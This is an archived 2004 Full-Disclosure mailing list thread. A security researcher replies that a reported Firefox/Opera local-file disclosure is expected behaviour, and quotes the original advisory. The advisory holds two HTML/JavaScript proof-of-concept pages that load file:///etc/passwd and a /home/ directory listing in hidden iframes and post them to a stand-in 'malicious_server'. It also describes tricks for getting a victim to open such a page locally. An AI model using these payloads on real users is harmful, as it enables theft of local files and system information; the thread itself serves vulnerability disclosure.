lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: thor at pivx.com (Thor Larholm)
Subject: Disclosure of local file content in Mozilla Firefox and Opera

This is not a vulnerability, it is expected behavior.

Mozilla shares the same zone design as IE which means that a file from the local file zone can read any other file from the local file zone. You cannot use this approach to read a local file from another zone such as the Internet zone. From the Internet zone, you can also only read the content of files from the same zone, same protocol and same domain.

I agree that Mozilla has implemented quite a lot of proprietary IE extensions which it should have not done, however reading the innerHTML of an element through document.all does not circumvent the traditional zone security checks already in place.



Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
thor@...x.com
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6  20CD 5BDB 3D99 4207 AEE9

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. 
<http://www.pivx.com/qwikfix>  



-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Giovanni Delvecchio
Sent: Monday, December 06, 2004 3:24 PM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] Disclosure of local file content in Mozilla Firefox and Opera

Disclosure of local file content in Mozilla Firefox and Opera


Note:
I don't know if it could be considered really a security problem, anyway 
i'll try to explain my ideas.
Sorry for my bad english.


Author: Giovanni Delvecchio


Applications affected:

- Firefox 1.0
- Mozilla 1.7
- Opera 7.54 (*)

( maybe also previous versions )


Tested versions:

- Firefox 1.0 on Linux and Windows
- Mozilla 1.7 on Windows
- Opera 7.51,..7.54 on Linux



Note:
The content of the following text could be applied also to other browsers, i 
have checked just Mozilla, Firefox,Opera and Microsoft Internet Explorer.
Microsoft Internet Explorer seems not to be affected.




Description:
===========
A possible problem exist in some browsers where a frame can gain access to 
attributes of another frame or iframe.

An application of this "bug?" could be the possibility to disclose local 
directory structure.

Moreover ther is is a possibility for a remote users to get the content of 
target users's local files.
This can be achieved by using of the method .innerHTML , such method isn't 
standard but
it's supported  from the most broswers like Opera and Mozila Firefox.

With Opera, i have noted that is possible read the content of local file 
just if they have *.htm or *.hml extension.



PoC:
===
The following PoCs are refered to linux versions of Firefox and Opera, but 
they can be applied also to Windows versions.


Read a local file by inner.HTML method:

--------------------------------------------------------
<HTML>

<BODY onLoad="ReadFileContent()" >

<iframe name="local_file" src="file:///etc/passwd" height=0 
width=0></iframe>

<form name="module" method="post" action="http://malicious_server/grab.php" 
ENCTYPE="text/plain">
<input name="content" type="hidden" size="300" >
</form>


<script>

function ReadFileContent(){

alert(local_file.document.all(0).innerHTML);

document.module.content.value+=local_file.document.all(0).innerHTML;
//send content to malicious_server
document.module.submit();
}

</script>

</body>

</html>

(*) it works with Firefox  with Opera it works just a file has .htm or html 
extension.
-----------------------------------------------------------




Enum /home directory structure:
----------------------------------------


<html>

<body onLoad="

  for(i=0;i<local_files.document.links.length;i++)
           
{document.module.content.value+=local_files.document.links.item(i);}
  alert(document.module.content.value);
  //send list_files at malicious_server
  document.module.submit();

              ">


<form name="module" method="post" action="http://malicious_server/grab.php" 
ENCTYPE="text/plain">
<input name="content" type="hidden" size="300" >
</form>


<iframe name="local_files" src="file:///home/" height=0
width=0></iframe>


</body>

</html>
-------------------------------------------




Impact:
======
A malicious server could :

- obtain content of /home/ directory ( or c:\Document and Setting\ for 
windows system  ) and so know a set of usernames present on system target.

- know if a particolar program is installed on target system for a succesive 
attack.

- Read confidential file content

- Read browser's cache
In opera it is located in  ~/.opera/cache4, instead in Mozilla Firefox it's 
in /.mozilla/firefox/$RANDOM-STRING.default/Cache.
Since is possible enum the directory structure , a malicious user could  
easily  know the path to firefox's cache

Anyway it cannot be exploited "directly" by a remote site, but only if the 
page is opened from a local path ( file://localpath/code.htm),  since the  
iframe belongs to a local domain.

Note: with Internet Explorer these PoCs doesn't work even in local.




Possible method of remote exploitation:
================================

Question:
How could a malicious remote user exploit it ?


My idea is the following:

After that the user "victim" has required http://maliciuos_server/page.htm,
if malicious_server responds with a page containing an unknown Content-Type
field ( for example text/html. ,note the dot) ,the browser will show a
dialog window with some options (open, save, cancel). Choosing "Open" to
view this page, it will be downloaded and opened in local ; javascript code
will be executed in local context.
Obviously, if user chooses to save and after open it the result is equal.

(*) For Opera this  method of remote exploitation requires that opera must
be setted as Default Application in "handler for saved files" whether the
user choose "Open" in the dialog window.


Another possible remote exploitation suggest by Lie Die Yu in response to a 
my message on bugtraq
( http://www.securityfocus.com/archive/1/382855/2004-11-30/2004-12-06/0 ) :

"Ask target to open an HTML file in a remote SMBFS folder - expecting
him to mount -t smbfs [...] /mnt/[...] and open "/mnt/[...].html" in Mozilla 
"




Vendor notice
==============
24th November 2004: I have contacted mozilla by security-at-mozilla.org
and Opera by its bug track page at https://bugs.opera.com/wizard/

No response from both at the moment.



Solution
========
- Disable Javascript

Note: I have not checked, but seems that Firefox 1.0 RC1 is not affected.



Best regards,

Giovanni Delvecchio

_________________________________________________________________
Ricerche online pi? semplici e veloci con MSN Toolbar! 
http://toolbar.msn.it/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ